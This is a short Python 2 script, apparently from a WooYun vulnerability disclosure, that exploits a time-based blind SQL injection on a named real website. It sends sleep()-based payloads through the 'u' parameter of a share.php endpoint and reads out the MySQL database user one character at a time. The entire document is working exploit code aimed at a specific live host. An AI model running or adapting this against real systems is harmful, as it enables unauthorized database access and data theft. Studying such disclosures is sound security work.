WooYun.org

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@','_', '.']
print 'start to retrive MySQL user:'
user = ''
for i in range(0, 40):
    for payload in payloads:
        conn = httplib.HTTPConnection('huodong2.4399.com', timeout=60)
        s = '945928751 and ' \
            'sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s))) ' \
            % (i, ord(payload))
        conn.request(method='GET',
                     url='/comm/invitewap/share.php?cu=568443&from=singlemessage&token=04dd20&id=406&ext=&isappinstalled=1&u='+urllib.quote(s),
                     headers=headers)
        start_time = time.time()
        conn.getresponse().read()
        if time.time() - start_time > 1.0:
            user += payload
            print '[in progress]', user
            break
        else:
            #print '.'
            pass
print '\nMySQL user is', user